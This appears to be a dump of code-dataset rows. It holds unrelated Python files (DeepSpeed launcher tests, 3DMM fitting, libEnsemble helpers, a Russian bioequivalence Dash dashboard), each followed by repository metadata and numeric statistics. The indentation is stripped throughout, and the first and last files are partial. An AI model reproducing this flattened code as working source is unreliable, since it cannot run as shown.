cluster_info = make_mock_cluster_info(["0.0.0.0", "0.0.0.1"], 0)
mock_cluster_info.return_value = cluster_info
mock_start_time = time.time()
mock_time.return_value = mock_start_time
mock_check_sshd.side_effect = ValueError("no sshd greeting")
train_entrypoint = "model_def:TrialClass"
sshd_cmd = autodeepspeed.create_sshd_cmd()
pid_server_cmd = autodeepspeed.create_pid_server_cmd(
cluster_info.allocation_id, len(cluster_info.slot_ids)
)
deepspeed_cmd = autodeepspeed.create_run_command(
cluster_info.container_addrs[0], autodeepspeed.hostfile_path
)
pid_client_cmd = autodeepspeed.create_pid_client_cmd(cluster_info.allocation_id)
log_redirect_cmd = autodeepspeed.create_log_redirect_cmd()
harness_cmd = autodeepspeed.create_harness_cmd(train_entrypoint)
launch_cmd = pid_server_cmd + deepspeed_cmd + pid_client_cmd + log_redirect_cmd + harness_cmd
sshd_proc_mock = mock.MagicMock()
launch_proc_mock = mock.MagicMock()
def mock_process(cmd: List[str], *args: Any, **kwargs: Any) -> Any:
if cmd == sshd_cmd:
return sshd_proc_mock(*args, **kwargs)
if cmd == launch_cmd:
return launch_proc_mock(*args, **kwargs)
return None
mock_subprocess.side_effect = mock_process
with set_container_id_env_var():
with pytest.raises(ValueError, match="no sshd greeting"):
autodeepspeed.main(train_entrypoint)
mock_cluster_info.assert_called_once()
assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
assert os.environ["USE_DEEPSPEED"] == "1"
assert os.environ["PDSH_SSH_ARGS"] == (
"-o PasswordAuthentication=no -o StrictHostKeyChecking=no "
f"-p {constants.DTRAIN_SSH_PORT} -2 -a -x %h"
)
mock_subprocess.assert_called_once_with(sshd_cmd)
mock_check_sshd.assert_called_once_with(
cluster_info.container_addrs[0], mock_start_time + 20, constants.DTRAIN_SSH_PORT
)
sshd_proc_mock().kill.assert_called_once()
sshd_proc_mock().wait.assert_called_once()
# Cleanup deepspeed environment file created in autodeepspeed.main
deepspeed_env_path = os.path.join(os.getcwd(), DEEPSPEED_ENVIRONMENT_NAME)
if os.path.isfile(deepspeed_env_path):
os.remove(deepspeed_env_path)
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
def test_launch_one_slot(
mock_cluster_info: mock.MagicMock, mock_subprocess: mock.MagicMock
) -> None:
cluster_info = make_mock_cluster_info(["0.0.0.0"], 0)
mock_cluster_info.return_value = cluster_info
train_entrypoint = "model_def:TrialClass"
pid_server_cmd = autodeepspeed.create_pid_server_cmd(
cluster_info.allocation_id, len(cluster_info.slot_ids)
)
deepspeed_cmd = autodeepspeed.create_run_command("localhost", autodeepspeed.hostfile_path)
pid_client_cmd = autodeepspeed.create_pid_client_cmd(cluster_info.allocation_id)
log_redirect_cmd = autodeepspeed.create_log_redirect_cmd()
harness_cmd = autodeepspeed.create_harness_cmd(train_entrypoint)
launch_cmd = pid_server_cmd + deepspeed_cmd + pid_client_cmd + log_redirect_cmd + harness_cmd
with set_container_id_env_var():
autodeepspeed.main(train_entrypoint)
mock_cluster_info.assert_called_once()
assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
assert os.environ["USE_DEEPSPEED"] == "1"
mock_subprocess.assert_called_once_with(launch_cmd)
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
def test_launch_fail(mock_cluster_info: mock.MagicMock, mock_subprocess: mock.MagicMock) -> None:
cluster_info = make_mock_cluster_info(["0.0.0.0"], 0)
mock_cluster_info.return_value = cluster_info
mock_subprocess.return_value.wait.return_value = 1
train_entrypoint = "model_def:TrialClass"
pid_server_cmd = autodeepspeed.create_pid_server_cmd(
cluster_info.allocation_id, len(cluster_info.slot_ids)
)
deepspeed_cmd = autodeepspeed.create_run_command("localhost", autodeepspeed.hostfile_path)
pid_client_cmd = autodeepspeed.create_pid_client_cmd(cluster_info.allocation_id)
log_redirect_cmd = autodeepspeed.create_log_redirect_cmd()
harness_cmd = autodeepspeed.create_harness_cmd(train_entrypoint)
launch_cmd = pid_server_cmd + deepspeed_cmd + pid_client_cmd + log_redirect_cmd + harness_cmd
with set_container_id_env_var():
ret = autodeepspeed.main(train_entrypoint)
assert ret == 1
mock_cluster_info.assert_called_once()
assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
assert os.environ["USE_DEEPSPEED"] == "1"
mock_subprocess.assert_called_once_with(launch_cmd)
@mock.patch("subprocess.Popen")
@mock.patch("determined.get_cluster_info")
@mock.patch("determined.common.api.post")
def test_launch_worker(
mock_api: mock.MagicMock, mock_cluster_info: mock.MagicMock, mock_subprocess: mock.MagicMock
) -> None:
cluster_info = make_mock_cluster_info(["0.0.0.0", "0.0.0.1"], 1)
mock_cluster_info.return_value = cluster_info
with set_container_id_env_var():
autodeepspeed.main("model_def:TrialClass")
mock_cluster_info.assert_called_once()
assert os.environ["DET_CHIEF_IP"] == cluster_info.container_addrs[0]
mock_api.assert_called_once()
pid_server_cmd = autodeepspeed.create_pid_server_cmd(
cluster_info.allocation_id, len(cluster_info.slot_ids)
)
sshd_cmd = autodeepspeed.create_sshd_cmd()
expected_cmd = pid_server_cmd + sshd_cmd
mock_subprocess.assert_called_once_with(expected_cmd)
def make_mock_cluster_info(container_addrs: List[str], container_rank: int) -> det.ClusterInfo:
rendezvous_info_mock = det.RendezvousInfo(
container_addrs=container_addrs, container_rank=container_rank
)
cluster_info_mock = det.ClusterInfo(
master_url="localhost",
cluster_id="clusterId",
agent_id="agentId",
slot_ids=[0, 1, 2, 3],
task_id="taskId",
allocation_id="allocationId",
session_token="sessionToken",
task_type="TRIAL",
rendezvous_info=rendezvous_info_mock,
)
return cluster_info_mock
@contextlib.contextmanager
def set_container_id_env_var() -> Iterator[None]:
try:
os.environ["DET_CONTAINER_ID"] = "containerId"
yield
finally:
del os.environ["DET_CONTAINER_ID"]
| 37.703846
| 97
| 0.74365
| 1,315
| 9,803
| 5.145247
| 0.117871
| 0.100798
| 0.078037
| 0.009459
| 0.825303
| 0.809932
| 0.789388
| 0.78392
| 0.766923
| 0.766332
| 0
| 0.007398
| 0.158829
| 9,803
| 259
| 98
| 37.849421
| 0.813122
| 0.013159
| 0
| 0.650718
| 0
| 0
| 0.099266
| 0.037742
| 0
| 0
| 0
| 0
| 0.148325
| 1
| 0.043062
| false
| 0.009569
| 0.047847
| 0
| 0.124402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a794afc61ee22de0ab59c8150be151318fc4dc97
| 144
|
py
|
Python
|
hls4ml/__init__.py
|
ngpaladi/hls4ml
|
54861d0f611ee72f779a8f739b5fac571f3e79c2
|
[
"Apache-2.0"
] | 1
|
2021-07-06T12:09:49.000Z
|
2021-07-06T12:09:49.000Z
|
hls4ml/__init__.py
|
ngpaladi/hls4ml
|
54861d0f611ee72f779a8f739b5fac571f3e79c2
|
[
"Apache-2.0"
] | 1
|
2020-11-26T09:45:05.000Z
|
2020-11-26T09:45:05.000Z
|
hls4ml/__init__.py
|
ngpaladi/hls4ml
|
54861d0f611ee72f779a8f739b5fac571f3e79c2
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
__version__ = '0.5.0'
from hls4ml import converters
from hls4ml import report
from hls4ml import utils
| 18
| 38
| 0.819444
| 21
| 144
| 5.190476
| 0.52381
| 0.275229
| 0.440367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 0.145833
| 144
| 7
| 39
| 20.571429
| 0.837398
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ac45453a19894882d58b1de661aabeddaf118808
| 40
|
py
|
Python
|
src/magicdb/Queries/__init__.py
|
CircleOnCircles/MagicDB
|
03fca4a2e4c75ad016a2338ac30f515393d20742
|
[
"MIT"
] | null | null | null |
src/magicdb/Queries/__init__.py
|
CircleOnCircles/MagicDB
|
03fca4a2e4c75ad016a2338ac30f515393d20742
|
[
"MIT"
] | null | null | null |
src/magicdb/Queries/__init__.py
|
CircleOnCircles/MagicDB
|
03fca4a2e4c75ad016a2338ac30f515393d20742
|
[
"MIT"
] | null | null | null |
from magicdb.Queries.Query import Query
| 20
| 39
| 0.85
| 6
| 40
| 5.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ac5232f986f8cddef39a53c01b7fafac3fd70f44
| 30
|
py
|
Python
|
cocob/__init__.py
|
mihahauke/scinol_icml2019
|
8f6bf250c9501a47d3c4b2323f830abcbf56cce3
|
[
"MIT"
] | 3
|
2020-04-30T11:32:46.000Z
|
2021-04-23T01:16:54.000Z
|
cocob/__init__.py
|
mihahauke/scinol_icml2019
|
8f6bf250c9501a47d3c4b2323f830abcbf56cce3
|
[
"MIT"
] | 6
|
2020-01-28T22:55:13.000Z
|
2022-02-10T00:20:24.000Z
|
cocob/__init__.py
|
mihahauke/scinol_icml2019
|
8f6bf250c9501a47d3c4b2323f830abcbf56cce3
|
[
"MIT"
] | 1
|
2020-09-23T07:26:31.000Z
|
2020-09-23T07:26:31.000Z
|
from .cocob_optimizer import *
| 30
| 30
| 0.833333
| 4
| 30
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ac6f63d697191beec992c5613929c859def5c39d
| 4,206
|
py
|
Python
|
deep3dmap/core/renderer/renderer_demo/fitting.py
|
achao2013/DeepRecon
|
1c9b0480710212e1fe86ab75dcf0b30bd9f654e7
|
[
"Apache-2.0"
] | 30
|
2022-02-05T18:35:27.000Z
|
2022-02-09T09:14:41.000Z
|
deep3dmap/core/renderer/renderer_demo/fitting.py
|
achao2013/DeepRecon
|
1c9b0480710212e1fe86ab75dcf0b30bd9f654e7
|
[
"Apache-2.0"
] | null | null | null |
deep3dmap/core/renderer/renderer_demo/fitting.py
|
achao2013/DeepRecon
|
1c9b0480710212e1fe86ab75dcf0b30bd9f654e7
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from mesh.vertices import *
from geometry.camera import *
from time import time
def fit_points(x, X_ind, model, max_iter = 4):
'''
Args:
x: (2, n) image points
X_ind: (n,) corresponding Model vertices index
model: 3DMM
max_iter: iteration
Returns:
pp: (6, 1). pose parameters
sp: (199, 1). shape parameters
ep: (29, 1). exp parameters
'''
#-- init
sp = np.zeros((199, 1), dtype = np.float32)
ep = np.zeros((29, 1), dtype = np.float32)
#-------------------- estimate
X_ind_all = np.tile(X_ind[np.newaxis, :], [3, 1])*3
X_ind_all[1, :] += 1
X_ind_all[2, :] += 2
valid_ind = X_ind_all.flatten('F')
shapeMU = model['shapeMU'][valid_ind, :]
shapePC = model['shapePC'][valid_ind, :]
expPC = model['expPC'][valid_ind, :]
stf = time()
for i in range(max_iter):
X = shapeMU + shapePC.dot(sp) + expPC.dot(ep)
X = np.reshape(X, [len(X)/3, 3]).T
# if i>0:
# x_hat = scaled_orthog_project(X, s, R, t2d)
# plt.plot(x[0,:], 128-1-x[1,:], 'yx')
# plt.plot(x_hat[0,:], 128-1-x_hat[1,:], 'b.')
# plt.show()
#----- estimate pose
P = estimate_affine_matrix(x, X)
s, R, t2d = P2sRt(P)
#print 'Iter:{}; estimated pose: s {}, rx {}, ry {}, rz {}, t1 {}, t2 {}'.format(i, s, rx, ry, rz, t2d[0], t2d[1])
#----- estimate shape
# expression
shape = shapePC.dot(sp)
shape = np.reshape(shape, [len(shape)/3, 3]).T
ep = estimate_expression(x, shapeMU, expPC, model['expEV'], shape, s, R, t2d, lamb = 10)
# shape
expression = expPC.dot(ep)
expression = np.reshape(expression, [len(expression)/3, 3]).T
sp = estimate_shape(x, shapeMU, shapePC, model['shapeEV'], expression, s, R, t2d, lamb = 10)
rx, ry, rz = matrix2angle(R)
pose_para = np.array([s, rx, ry, rz, t2d[0], t2d[1]])[:, np.newaxis]
return pose_para, sp, ep
def fit_points_simple(x, X_ind, model, max_iter = 4):
'''
Args:
x: (2, n) image points
X_ind: (n,) corresponding Model vertices index
model: 3DMM
max_iter: iteration
Returns:
pp: (6, 1). pose parameters
sp: (199, 1). shape parameters
ep: (29, 1). exp parameters
'''
n_sp = 100
n_ep = 25
#-- init
sp = np.zeros((n_sp, 1), dtype = np.float32)
ep = np.zeros((n_ep, 1), dtype = np.float32)
#-------------------- estimate
X_ind_all = np.tile(X_ind[np.newaxis, :], [3, 1])*3
X_ind_all[1, :] += 1
X_ind_all[2, :] += 2
valid_ind = X_ind_all.flatten('F')
shapeMU = model['shapeMU'][valid_ind, :]
shapePC = model['shapePC'][valid_ind, :n_sp]
expPC = model['expPC'][valid_ind, :n_ep]
stf = time()
for i in range(max_iter):
X = shapeMU + shapePC.dot(sp) + expPC.dot(ep)
X = np.reshape(X, [len(X)/3, 3]).T
# if i>0:
# x_hat = scaled_orthog_project(X, s, R, t2d)
# plt.plot(x[0,:], 128-1-x[1,:], 'yx')
# plt.plot(x_hat[0,:], 128-1-x_hat[1,:], 'b.')
# plt.show()
#----- estimate pose
P = estimate_affine_matrix(x, X)
s, R, t2d = P2sRt(P)
#print 'Iter:{}; estimated pose: s {}, rx {}, ry {}, rz {}, t1 {}, t2 {}'.format(i, s, rx, ry, rz, t2d[0], t2d[1])
#----- estimate shape
# expression
shape = shapePC.dot(sp)
shape = np.reshape(shape, [len(shape)/3, 3]).T
ep = estimate_expression(x, shapeMU, expPC, model['expEV'][:n_ep,:], shape, s, R, t2d, lamb = 20)
# shape
expression = expPC.dot(ep)
expression = np.reshape(expression, [len(expression)/3, 3]).T
sp = estimate_shape(x, shapeMU, shapePC, model['shapeEV'][:n_sp,:], expression, s, R, t2d, lamb = 40)
rx, ry, rz = matrix2angle(R)
pose_para = np.array([s, rx, ry, rz, t2d[0], t2d[1]])[:, np.newaxis]
sp_f = np.zeros((199, 1), dtype = np.float32); sp_f[:n_sp,:] = sp;
ep_f = np.zeros((29, 1), dtype = np.float32);ep_f[:n_ep,:] = ep;
return pose_para, sp_f, ep_f
| 33.380952
| 122
| 0.532097
| 628
| 4,206
| 3.441083
| 0.16879
| 0.025914
| 0.025914
| 0.041647
| 0.886164
| 0.831559
| 0.831559
| 0.78112
| 0.78112
| 0.78112
| 0
| 0.049062
| 0.277936
| 4,206
| 126
| 123
| 33.380952
| 0.662496
| 0.282454
| 0
| 0.576271
| 0
| 0
| 0.022061
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033898
| false
| 0
| 0.084746
| 0
| 0.152542
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3be61a56bb8998d5cbef58672b419514146035c5
| 33
|
py
|
Python
|
labjack_u6/threading.py
|
LouGrossi/labjack_u6
|
36cb0be9a86e4f167ca58a5d30b59cfcfead00a6
|
[
"MIT"
] | null | null | null |
labjack_u6/threading.py
|
LouGrossi/labjack_u6
|
36cb0be9a86e4f167ca58a5d30b59cfcfead00a6
|
[
"MIT"
] | null | null | null |
labjack_u6/threading.py
|
LouGrossi/labjack_u6
|
36cb0be9a86e4f167ca58a5d30b59cfcfead00a6
|
[
"MIT"
] | null | null | null |
import threading, signal, time
| 8.25
| 30
| 0.757576
| 4
| 33
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 33
| 3
| 31
| 11
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3bea626f166d1bdebd5aad10c140520523e23500
| 2,594
|
py
|
Python
|
libensemble/tests/unit_tests/setup.py
|
Kardyne/libensemble
|
566c8f5daafe2ad4deebc13198a1e131e4ce6542
|
[
"BSD-2-Clause"
] | null | null | null |
libensemble/tests/unit_tests/setup.py
|
Kardyne/libensemble
|
566c8f5daafe2ad4deebc13198a1e131e4ce6542
|
[
"BSD-2-Clause"
] | null | null | null |
libensemble/tests/unit_tests/setup.py
|
Kardyne/libensemble
|
566c8f5daafe2ad4deebc13198a1e131e4ce6542
|
[
"BSD-2-Clause"
] | null | null | null |
import numpy as np
from libensemble.alloc_funcs.give_sim_work_first import give_sim_work_first
from libensemble.history import History
#-------------------------------------------------------------------------------------------------
# Set up sim_specs, gen_specs, exit_criteria
def make_criteria_and_specs_0(simx=10):
sim_specs={'sim_f': np.linalg.norm, 'in':['x_on_cube'], 'out':[('f',float),('fvec',float,3)], }
gen_specs={'gen_f': np.random.uniform, 'in':[], 'out':[('x_on_cube',float),('priority',float),('local_pt',bool)], 'ub':np.ones(1), 'nu':0}
exit_criteria={'sim_max':simx}
return sim_specs, gen_specs, exit_criteria
def make_criteria_and_specs_1(simx=10):
sim_specs={'sim_f': np.linalg.norm, 'in':['x'], 'out':[('g',float)], }
gen_specs={'gen_f': np.random.uniform, 'in':[], 'out':[('x',float),('priority',float)], }
exit_criteria={'sim_max':simx, 'stop_val':('g',-1), 'elapsed_wallclock_time':0.5}
return sim_specs, gen_specs, exit_criteria
def make_criteria_and_specs_1A(simx=10):
sim_specs={'sim_f': np.linalg.norm, 'in':['x'], 'out':[('g',float)], }
gen_specs={'gen_f': np.random.uniform, 'in':[], 'out':[('x',float),('priority',float),('sim_id',int)], }
exit_criteria={'sim_max':simx, 'stop_val':('g',-1), 'elapsed_wallclock_time':0.5}
return sim_specs, gen_specs, exit_criteria
#-------------------------------------------------------------------------------------------------
# Set up history array
def hist_setup1(sim_max=10, H0_in=[]):
sim_specs, gen_specs, exit_criteria = make_criteria_and_specs_0(simx=sim_max)
alloc_specs = {'alloc_f': give_sim_work_first, 'out':[('allocated', bool)]} #default for libE
H0=H0_in
hist = History(alloc_specs, sim_specs, gen_specs, exit_criteria, H0)
return hist, sim_specs, gen_specs, exit_criteria, alloc_specs
def hist_setup2(sim_max=10, H0_in=[]):
sim_specs, gen_specs, exit_criteria = make_criteria_and_specs_1(simx=sim_max)
alloc_specs = {'alloc_f': give_sim_work_first, 'out':[('allocated', bool)]} #default for libE
H0=H0_in
hist = History(alloc_specs, sim_specs, gen_specs, exit_criteria, H0)
return hist, sim_specs, gen_specs, exit_criteria, alloc_specs
def hist_setup2A_genout_sim_ids(sim_max=10):
sim_specs, gen_specs, exit_criteria = make_criteria_and_specs_1A(simx=sim_max)
alloc_specs = {'alloc_f': give_sim_work_first, 'out':[('allocated', bool)]} #default for libE
H0=[]
hist = History(alloc_specs, sim_specs, gen_specs, exit_criteria, H0)
return hist, sim_specs, gen_specs, exit_criteria, alloc_specs
| 49.884615
| 142
| 0.653045
| 385
| 2,594
| 4.044156
| 0.181818
| 0.082209
| 0.091843
| 0.13359
| 0.83237
| 0.81824
| 0.813102
| 0.813102
| 0.813102
| 0.813102
| 0
| 0.017376
| 0.112567
| 2,594
| 51
| 143
| 50.862745
| 0.658992
| 0.117965
| 0
| 0.5
| 0
| 0
| 0.118808
| 0.01929
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.083333
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ce23262bd1b8f73aa6bd64a6187908084ec94ccc
| 61,040
|
py
|
Python
|
SmartMedApp/backend/modules/dash/BioequivalenceDashboard.py
|
vovochkab/SmartMed
|
123540263db8ec2225e7bb0ea949ba96a8c5d4f3
|
[
"Apache-2.0"
] | 2
|
2020-10-05T18:03:46.000Z
|
2020-11-15T18:54:53.000Z
|
SmartMedApp/backend/modules/dash/BioequivalenceDashboard.py
|
vovochkab/SmartMed
|
123540263db8ec2225e7bb0ea949ba96a8c5d4f3
|
[
"Apache-2.0"
] | 2
|
2021-09-25T15:20:19.000Z
|
2021-09-26T15:56:52.000Z
|
SmartMedApp/backend/modules/dash/BioequivalenceDashboard.py
|
vovochkab/SmartMed
|
123540263db8ec2225e7bb0ea949ba96a8c5d4f3
|
[
"Apache-2.0"
] | 7
|
2020-09-07T17:28:54.000Z
|
2021-10-01T14:32:18.000Z
|
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objects as go
import plotly.express as px
import numpy as np
import pandas as pd
from math import e
from .text.markdown_bio import *
from .Dashboard import Dashboard
def round_df(df):
cols = df.columns
for j in range(0, len(cols)):
for i in range(len(df)):
if type(df.iloc[i, j]) != str and type(df.iloc[i, j]) != int:
num = str(df.iloc[i, j])
num = num.replace(']', '')
while not num[0].isdigit():
num = num[1:]
if df.iloc[i, j] < 1000 and df.iloc[i, j] >= 0.01:
point = num.find('.')
df.iloc[i, j] = num[:point + 3]
elif df.iloc[i, j] > 1000:
point = num.find('.')
num = num[:point]
df.iloc[i, j] = num[0] + '.' + \
num[1:3] + 'e' + str(len(num) - 1)
elif 'e' in num:
epos = num.find('e')
df.iloc[i, j] = num[0:4] + num[epos:]
elif df.iloc[i, j] < 0.01:
notnul = 2
while len(num) < notnul and num[notnul] == '0':
notnul += 1
if notnul == len(num):
df.iloc[i, j] = '0'
else:
df.iloc[i, j] = num[notnul] + '.' + \
num[notnul + 1:notnul + 3] + 'e-' + str(notnul - 1)
return df
class BioequivalenceDashboard(Dashboard):
def _generate_layout(self):
# metrics inludings is checked inside method
return html.Div(self.graphs_and_lists)
def _generate_criteria(self):
if self.settings[0].plan == 'parallel':
if self.settings[0].check_normal == 'Kolmogorov' and self.settings[0].check_uniformity == 'F':
data = {'ะัะธัะตัะธะน': ['ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ',
'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ', 'F-ะบัะธัะตัะธะน'],
'ะััะฟะฟะฐ': ['R', 'T', 'RT'],
'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].kstest_r[0],
self.settings[0].kstest_t[0], self.settings[0].f[0]],
'p-ััะพะฒะตะฝั': [self.settings[0].kstest_r[1],
self.settings[0].kstest_t[1], self.settings[0].f[1]]}
elif self.settings[0].check_normal == 'Kolmogorov' and self.settings[0].check_uniformity == 'Leven':
data = {'ะัะธัะตัะธะน': ['ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ',
'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ', 'ะะตะฒะตะฝะฐ'],
'ะััะฟะฟะฐ': ['R', 'T', 'RT'],
'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].kstest_r[0],
self.settings[0].kstest_t[0], self.settings[0].levene[0]],
'p-ััะพะฒะตะฝั': [self.settings[0].kstest_r[1],
self.settings[0].kstest_t[1], self.settings[0].levene[1]]}
elif self.settings[0].check_normal == 'Shapiro' and self.settings[0].check_uniformity == 'Leven':
data = {'ะัะธัะตัะธะน': ['ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะะตะฒะตะฝะฐ'],
'ะััะฟะฟะฐ': ['R', 'T', 'RT'],
'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].shapiro_r[0],
self.settings[0].shapiro_t[0], self.settings[0].levene[0]],
'p-ััะพะฒะตะฝั': [self.settings[0].shapiro_r[1],
self.settings[0].shapiro_t[1], self.settings[0].levene[1]]}
else:
data = {'ะัะธัะตัะธะน': ['ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'F-ะบัะธัะตัะธะน'],
'ะััะฟะฟะฐ': ['R', 'T', 'RT'],
'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].shapiro_r[0],
self.settings[0].shapiro_t[0], self.settings[0].f[0]],
'p-ััะพะฒะตะฝั': [self.settings[0].shapiro_r[1],
self.settings[0].shapiro_t[1], self.settings[0].f[1]]}
df = pd.DataFrame(data)
df = round_df(df)
return html.Div([html.Div(html.H1(children='ะัะฟะพะปะฝะตะฝะธะต ะบัะธัะตัะธะตะฒ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([dash_table.DataTable(
id='criteria',
columns=[{"name": i, "id": i, "deletable": True}
for i in df.columns],
data=df.to_dict('records'),
style_cell_conditional=[
{'if': {'column_id': 'ะัะธัะตัะธะน'},
'width': '25%'},
{'if': {'column_id': 'ะััะฟะฟะฐ'},
'width': '25%'},
{'if': {'column_id': 'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั'},
'width': '25%'},
{'if': {'column_id': 'p-ััะพะฒะตะฝั'},
'width': '25%'},
],
style_table={'overflowX': 'auto'},
export_format='xlsx'
)], style={'border-color': 'rgb(220, 220, 220)',
'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
style={'width': '78%', 'display': 'inline-block'}),
html.Div(dcc.Markdown(children=markdown_text_criteria), style={
'width': '18%', 'float': 'right', 'display': 'inline-block'})
])
], style={'margin': '50px'}
)
else:
if self.settings[0].check_normal =='Kolmogorov':
data = {'ะัะธัะตัะธะน':['ะะฐััะปะตััะฐ', 'ะะฐััะปะตััะฐ',
'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ', 'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ', 'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ',
'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ'],
'ะัะฑะพัะบะธ':['ะะตัะฒะฐั ะธ ะฒัะพัะฐั ะณััะฟะฟั',
'ะะตัะธะพะด 1 ะธ ะฟะตัะธะพะด 2', 'ะะตัะฒะฐั ะณััะฟะฟะฐ ัะตััะพะฒัะน ะฟัะตะฟะฐัะฐั', 'ะะตัะฒะฐั ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝัะน ะฟัะตะฟะฐัะฐั',
'ะัะพัะฐั ะณััะฟะฟะฐ ัะตััะพะฒัะน ะฟัะตะฟะฐัะฐั', 'ะัะพัั ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝัะน ะฟัะตะฟะฐัะฐั'],
'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั':[self.settings[0].bartlett_groups[0],
self.settings[0].bartlett_period[0], self.settings[0].kstest_t_1[0],
self.settings[0].kstest_r_1[0], self.settings[0].kstest_t_2[0], self.settings[0].kstest_r_2[0]],
'p-ััะพะฒะตะฝั':[self.settings[0].bartlett_groups[1],
self.settings[0].bartlett_period[1], self.settings[0].kstest_t_1[1],
self.settings[0].kstest_r_1[1], self.settings[0].kstest_t_2[1], self.settings[0].kstest_r_2[1]]}
else:
data = {'ะัะธัะตัะธะน':['ะะฐััะปะตััะฐ', 'ะะฐััะปะตััะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ',
'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ'],
